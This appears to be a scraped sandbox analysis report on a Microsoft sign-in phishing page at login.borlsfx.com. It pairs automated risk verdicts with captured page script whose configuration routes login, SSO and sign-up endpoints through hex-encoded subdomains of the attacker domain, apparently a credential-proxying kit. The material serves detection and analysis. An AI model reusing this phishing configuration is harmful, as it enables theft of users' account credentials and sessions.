"Cloudflare"
]
} |
|
| URL: https://login.borlsfx.com/844b56ecfd?nxx=766771764... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it includes some legitimate functionality like analytics and telemetry, it also interacts with external domains and uses obfuscated URLs, which raises moderate concerns. Additional context is needed to determine the overall intent and potential risks."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msftauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?login_hint=test%40test.com\u0026mkt=\u0026client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://login.borlsfx.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/{0}/winauth/sso?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2","iwaSsoProbeUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/{0}/winauth/ssoprobe?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2","iwaIFrameUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/{0}/winauth/iframe?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/common/winauth/sso/edgeredirect?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe3nJXtqBpAKW9IWJqrEAhaMguKNokinMRZNZp6kmJsMjWgd2j7SbSzvO4Wgep6d7uYZ8OJVOmyGJvScbs0Y0WMCs5UDWIJ4w--r13hFKhgFW8ISMFUgcopYOeCydaNSY7w1qjGMpXBGuTZQBTVqjxefSJPQjUqKU7cL2aoqeZW7lGaWllECk81zb1TtZZtnrS6WY-K-fRM6H_BoIUxOupLSAA","canary":"7SKMT22qThXSIb3L/ZhVSEK/mlIR+bpoeS1/blhbM/0=6:1:CANARY:W4edE1W/Fuu7c73W+RoHrwJ7BpRnbMV1KVMc1XndNFE=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2","sessionId":"31a21cd3-b708-4f93-a0e8-735ce1bf1300","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://login.borlsfx.com/common/instrumentation/reportpageload","dssostatus":"https://login.borlsfx.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js","sbundle":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/watsonsupportwithjquery.3.5.min_dc940oomzau4rsu8qesnvg2.js","fbundle":"https://aadcdn.msfta |
| URL: https://login.borlsfx.com/844b56ecfd?nxx=766771764... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including:
- Dynamic code execution through the use of obfuscated URLs and encoded strings, which could be used to execute remote or malicious code.
- Data exfiltration by sending user data (potentially including sensitive information like cookies or session identifiers) to external, untrusted domains.
- Redirects to suspicious domains, which could be used for phishing or other malicious activities.
The combination of these high-risk indicators suggests this script is likely malicious and poses a significant security risk."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASOftZ72jHRw2sF79dTke-P881i5IzPySwDq1zFqEzYOP0LjIwvGBknMfGWpBaXOIAIkPAtJkH_onTPlPBit9SU1KLEksz8vAssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbri1nbW928_ePi0LahjrnpuynCKVd882Ns3xMioMCQjItgzydhHPyojLNjVWz83xzNIO6kgPzXYUD8pJyPJV9_A1tTKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EHX8eimw8PXzv-zuMVv45bYmpSmmmuW2Z6RWSBtra2e4CziXmIhWFlWqV5SHpIlLl-SWZxaUl6VWSx7QYBhgcCDAA1\u0026login_hint=test%40test.com\u0026estsfed=1\u0026uaid=e52ef3c591884a48a80df5ca59efc70e\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com","urlMsaLogout":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/logout.srf?iframed_by=https%3a%2f%2flogin.microsoftonline.com","urlOtherIdpForget":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/forgetme.srf?iframed_by=https%3a%2f%2flogin.microsoftonline.com","showCantAccessAccountLink":true,"urlGitHubFed":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASOftZ72jHRw2sF79dTke-P881i5IzPySwDq1zFqEzYOP0LjIwvGBknMfGWpBaXOIAIkPAtJkH_onTPlPBit9SU1KLEksz8vAssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbri1nbW928_ePi0LahjrnpuynCKVd882Ns3xMioMCQjItgzydhHPyojLNjVWz83xzNIO6kgPzXYUD8pJyPJV9_A1tTKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EHX8eimw8PXzv-zuMVv45bYmpSmmmuW2Z6RWSBtra2e4CziXmIhWFlWqV5SHpIlLl-SWZxaUl6VWSx7QYBhgcCDAA1\u0026login_hint=test%40test.com\u0026estsfed=1\u0026uaid=e52ef3c591884a48a80df5ca59efc70e\u0026fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com\u0026idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350! |
| URL: https://aadcdn.msftauth.net/shared/1.0/content/js/... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The code is also accompanied by a third-party notice, indicating it is likely part of a larger, well-documented project. While the script uses some legacy practices like `XDomainRequest`, these pose only minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a standard web API, with no clear signs of malicious intent."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.com/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var |
| URL: https://login.borlsfx.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.borlsfx.com |
| URL: https://login.borlsfx.com/844b56ecfd?nxx=766771764... Model: Joe Sandbox AI | ```json
{
"risk_score": 2,
"reasoning": "The script primarily involves DOM manipulation and logging functionality, with no high-risk indicators like dynamic code execution or data exfiltration. It uses aggressive DOM manipulation techniques, which is a moderate-risk indicator, but there are no signs of malicious intent or interaction with suspicious domains."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
| URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Tired of seeing this? Rename your personal Microsoft account.",
"prominent_button_name": "Sign in with another account",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Tired of seeing this? Rename your personal Microsoft account.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://borlsfx.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://borlsfx.com |
Edit tour
chrome.exe (PID: 3880 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node